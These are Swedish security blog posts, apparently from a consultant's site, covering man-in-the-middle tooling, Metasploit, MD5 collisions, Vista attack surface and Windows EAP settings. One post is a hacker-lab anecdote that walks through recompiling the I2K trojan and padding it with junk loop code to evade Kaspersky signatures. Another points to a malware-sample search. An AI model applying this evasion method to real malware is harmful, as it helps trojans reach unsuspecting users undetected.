Efter lite diskussioner med kollegorna och en del tankeverksamhet stod det klart för mig vad jag ska använda för verktyg och hur dessa skall modifieras så att målet kan uppnås på enklaste sätt. Jag fastande för följande verktyg:
- Airodump från paketet Aircrack
- En accesspunkt som kan konfigureras via ett webb-UI, gärna någon som kan ha multipla SSID
- En virtuell maskin som klarar av att agera dhcp, dns, router, mitm och transparent proxy för div protokoll
- Fiddler, en httpproxy som är skriptbar
- Sombi, ett attackverktyg för SMB passing the hash
- Netwox, ett verktyg för div mitm attacker och annat nätlekande
Att sätta ihop alla dessa verktyg så de funkar tillsammans var nästa mål. Givetvis så börjar man med att testa de olika delmomenten var för sig och när alla moment funkar utan problem så kommer integrationen och då får man ta hand om de problem som uppstår i samband med det.
Värt att tillägga att tiden jag hade för att koka ihop detta var bara några dagar, man har ju dessutom kunder, projekt och kurser att sköta om ”dagtid” och då kommer detta vid sidan av men med ganska hög prioritet förstås.
Fortsättningen följer…
Microsoft har släppt beta 1 av MSCLM, en produkt som gör hantering av PKI och speciellt smartkort mycket enklare genom att erbjuda policybaserad utgivning av certifikat med möjlighet till centraliserad loggning och övervakning av CA-tjänsten samt hantering av nycklar och smartkort med tillhörande pinkoder, tillfälliga kort och ersättnings kort.
Det fina med CLM att den använder byggstenar som redan finns i Windows server och inte kräver en massa utveckling för att kunna uppnå den nivå av funktionalitet. CLM består av en elelr flera CA-tjänster (W2K3 CA), en databas (MSSQL 2005/MSDE/Express), en webserver (IIS) och klienter (IE eller motsv. webläsare). Detta gör att systemet är lätt att installera och köra samt att den har möjlighet att skala på ett enkelt sätt.
Hoppas detta kan sätta lite mer fart i en redan bra fungerande PKI i Windows då den kommer att bli mycket bättre och enklare att administrera och använda.
Läs mer om CLM hos microsoft : http://www.microsoft.com/windowsserversystem/clm
Man blir fundersam när stora postorderbolag uppmanar sina kunder att skicka kontoinformation i vykortsformat för att sedan komma på att det var en dålig ide och varna alla kunder, som utan att tänka fyllt i vykortet och skickat iväg den så att kontoinformationen är till allmän beskådan, att vem som helst som sett det vykortet nu kan använda informationen för att betala sina varor med dina pengar.
Samma företag skriver så här på sin webplats:
"I vår internetbutik skyddar vi dina uppgifter med hjälp av kryptering. SSL står för Secure Sockets Layer och är en funktion som gör att all information som skickas mellan köparen och säljaren krypteras."
Så vad var det som blev fel denna gång, man kan säkert beskylla den mänskligafaktorn den här gången med, men borde man inte kunna bättre?
Ingen har missat de senaste 0day och efterföljande exploiten för IE, firefox och MAC OSX, och alla bör vid det här läget ha förstått vikten av att uppdatera systemen. Till och med att några har tagit saken i egna händer och släppt egna uppdateringar och tillvägagångssätt för att kunna undvika bli drabbad.
Hur kommer det sig att man hinner släppa så många nya exploits och med den farten som vi ser? Svaret är inte att alla har blivit mycket skickligare programmerare utan att ganska många har lört sig använda ett av många tillgängliga verktyg för att skapa nya och modifiera gamla exploits så att de kan användas i samband med nya buggar.
Ett verktyg som många använder är Metasploit Framework som har kommit i en ny tappning med en rad mycket intressanta möjligheter. Förutom möjligheten att skapa och ändra exploits så har man infört ett system för att kunna automatisera tillämpning av dessa med ett par enkla steg och allt sparas givetvis i realtid till en databas så att man kan gå tillbaka och kontrollera sina resultat när man får lite tid över.
När ett verktyg som MSF blir så kraftfullt och effektivt så börjar en mängd människor intressera sig för att optimera processen ännu mer och ett bra exempel på det är ett verktyg som heter MSF eXploit Builder som är tänkt att underlätta skapandet eller ändringen av exploit med hjälp av grafisk wizards. Det blir med andra ord lite Next, Next, Exploit i fortsättningen.
Metasploit Framework finner du på http://www.metasploit.com/
MSF eXploit Builder finner du på https://www.securinfos.info/metasploit/MSF_XB.php
Jag körde här om veckan hacker lab i malmö och deltagarna ville så gärna se ett demo på en trojan som går förbi antivirus, sagt och gjort så tog jag en gammal trojan vid namnet I2K där jag hade källkoden och in i en kompilator, här skriver vi adressen och portnummret och....
Efter en lyckad kompilering så var det dags att visa att antivirus inte kan ta den "nya" trojanen, kopiera den till en dator med kaspersky och nä där försvann min nybakade trojan. Vad göra nu, jo vi moddar i koden och ser om det funkar...
while (true) do
begin
if 1=1 then
begin
break;
end;
end;
skrev koden ovan, som inte gör något, och körde lite cut & paste aktiviteter, skrolla lite och ctrl+v, skrolla lite och ctrl+v....
kompilera om nu och testa igen och gissa om jag blev glad :)
Nu tycker inte kaspersky och säkert många andra AV att min fil är en trojan och jag kan binda den med lite andra applikationer så att en användare känner sig säker när han eller hon klickar på den.
Den kod som jag la till i trojanen ändrar inget i funktionen med gör att den signatur som AV programmet har bryts och därmed så har vi fått en ny trojan som ingen känner igen.
Ännu ett spännande sätt att använda Google, att söka efter sårbarheter i källkod som finns på webben!
Tetsa själv de olika exempeln på http://www.cipher.org.uk/index.php?p=projects/bugle.project, kombinerat med Google Alert, http://www.google.com/alerts?t=3&hl=en_GB, kan det bli ganska spännande :)
Läste en intressant rapport från Symantec där de utsatte olika Vista builds för lite "tester" och det visar sig att de tidiga versionera har haft en del kalssiska problem som fixats i senare builds.
Det som oroar är att de problemen överhuvudtaget kunnde finnas i ett modernt och nyutvecklat stack, borde inte dessa kända problem, vi pratar om land, blat och tear atacker, varit fixade från början?
Värt att notera är att den nya IP stacken är fortfarande under utveckling och att den sannolikt kommer att utsättas för kontinuerliga tester och att IPv6 och det nya SMB2 kommer att spela allt större roll i fortsättningen.
Rapporten finns att läsa på http://www.symantec.com/avcenter/reference/ATR-VistaAttackSurface.pdf
Om man inte har något vettigt att göra så kan man alltid roa sig med att titta på exemplar av olika trojaner och virus, google kan givetvis användas för att söka rätta på dessa via sin binary search funktion.
Det gäller att hålla koll på filernas storlekar och unika signaturer för att få vettiga resultat, men om man vill prova detta utan att djupdyka i hur en binär ser ut så kan man ju alltid prova Malware Search från Metasploit, http://metasploit.com/research/misc/mwsearch/mwsearch.html, gå dit och skriva namnet eller en del av namnet på en trojan eller ett virus och vips så har du ett par exemplar av det sökta viruset :)
Under slutet på 2004 blev det känt att man kunnde generera två binärer med samma MD5 hash, dokumentet "MD5 To Be Considered Harmful Someday" finns att läsa på http://www.doxpara.com/md5_someday.pdf, inte så långt efter det kom det några exempel på att det går att skapa "vettiga" exempel där två X.509 certifikat, http://www.win.tue.nl/~bdeweger/CollidingCertificates/, eller två olika postscriptfiler har samma MD5 hash, http://www.cits.rub.de/MD5Collisions/.
Kan man skapa två olika binärer, en god och en ond, med samma MD5 hash? Svaret är ja men inte efter åt, än så länge så måste det göras redan från början. Man bakar heltenkelt ihop de två binärerna med ett anpassat packningsprogram de kör olika kod men har samma MD5 hash!
Kommer inte antivirus att fixa det? Kanske, det görs inte i någon större omfattning idag i alla fall :(
Hur är det med SRP då? Kör du MD5 så är det kört :(
Vill du testa detta så finns det gott om exempel, ett av de bättre finns på http://www.coresecurity.com/corelabs/projects/research_topics/Richarte_md5-crc32-cksum16-cksum32.zip och om du vill göra det själv så finns det lite verktyg som kan visa hur det funkar, kolla in ett mycket trevligt och lärorikt C# verktyg på The Code Project, http://www.codeproject.com/dotnet/HackingMd5.asp.
Gör nu inget dumt med dessa verktyg ;)
Denna gång handlar det om hur man tolkar sidor med ASCII text, om man gör en sida med lite text i och talar om att sidan bara innehåller ASCII men i texten lägger in sådana tecken som inte är rena ASCII hur tror su en webläsare visar sidan?
kolla själv på http://www.iku-ag.de/sicherheit/ascii-eng.jsp och du kommer säkert få ett gott skratt, glöm inte att köra i en sandbox ;)
Ett Windows power toy som krypterar data på flyttbartmedia med möjlighet till synkning och lagring av andra personliga inställningar som t.ex. WLAN inställningar.
Finns att hämta på http://www.microsoft.com/downloads/details.aspx?FamilyID=b3a87740-8196-455a-a346-8d2358ce0474&DisplayLang=en
Ändra standard inställningar för olika EAP-typer, för inställningar titta under respektive nyckel:
HKLM\SYSTEM\CurrentControlSet\Services\RasMan\PPP\EAP\[#]
[#] = 13 for Smart Card or other certificate
[#] = 25 for Protected EAP (PEAP)
[#] = 26 for Secured password (EAP-MSCHAP v2)
[#] = 4 for MD-5 Challenge (not configurable via Extension)
Ändra standard inloggningsmetod
HKLM\Software\Microsoft\EAPOL\Parameters\General\Global\AuthMode
0 for With user authentication
1 for With user re-authentication
2 for Computer only
Ändra standard beteenede för omautentisering
HKEY_LOCAL_MACHINE\Software\Microsoft\EAPOL\Parameters\General\Global\SupplicantMode
1 - Do not transmit. Specifies that EAPOL-Start messages are not sent.
2 - Transmit. Determines when to send EAPOL-Start messages and, if needed, sends an EAPOL-Start message.
3 - Transmit per 802.1x. Sends an EAPOL-Start message upon association to initiate the 802.1X authentication process.
Ett trevligt toolbar för IE, by MS, som kan användas på lite olika sätt för att vända och vrida på websidor båda som admin och hacker
Vad kan man göra med den:
-- Explore and modify the document object model (DOM) of a Web page.
-- Locate and select specific elements on a Web page through a variety of techniques.
-- Selectively disable Internet Explorer settings.
-- View HTML object class names, ID's, and details such as link paths, tab index values, and access keys.
-- Outline tables, table cells, images, or selected tags.
-- Validate HTML, CSS, WAI, and RSS Web feed links.
-- Display image dimensions, file sizes, path information, and alternate (ALT) text.
-- Immediately resize the browser window to a new resolution.
-- Selectively clear the browser cache and saved cookies. Choose from all objects or those associated with a given domain.
-- Choose direct links to W3C specification references, the Internet Explorer team weblog (blog), and other resources.
-- Display a fully featured design ruler to help accurately align and measure objects on your pages.
-- You can now selectively enable and disable CSS parsing.
-- The Misc menu contains a color picker.
-- Several link reports are available.
-- When you select an element in the DOM element tree list, the selected element scrolls into view if it is not already visible in the browser window.
Verktyget finns på http://www.microsoft.com/downloads/details.aspx?familyid=e59c3964-672d-4511-bb3e-2d5e1db91038&displaylang=en och är gratis
Fiddler är ett verktyg, by MS, som kan konsten att agera som http/https proxy för att inspektera trafiken och ändra den, den kan användas för all från felsökning till hacking. Som alla andra verktyg i området så är den givitvis anpassnings och utökningsbart.
Verktyget finns på http://www.fiddlertool.com/fiddler/ och är gratis.
ASLR gör att adresser och pekare blir dynamiska i Vista, systemet slumpar nya Stack och Heap Adresser varje gång den startar och alla EXE och DLL:er som är del av OS:et får slumpmässiga adresser vilket gör att exploits måste jobba smartare för att hitta de rätta adresserna i systemet.
Säkerheten är som bekant inte starkare än den svagaste länken och om den nya säkerhetsnivån ska hållas i ett system så måste alla andra program vara kompilerade med en ny PE-header som möjliggör slumpmässig adressering.
för mer läsning:
Ett mycket trevligt verktyg som kan användas för att kontrollera vad en viss sida kommunicerar med med möjlighet att kunna skapa blacklistor för domäner i IE
Verktyget kan hämtas på http://research.microsoft.com/URLTracer/ och är gratis.
Ett enkelt GHDB (Google Hacking Database) skript som jag skapat för ett uppdrag, kan även användas med FSDB (Foundstone) och MSN om man anpassar den lite då den inte kräver någon Google API nyckel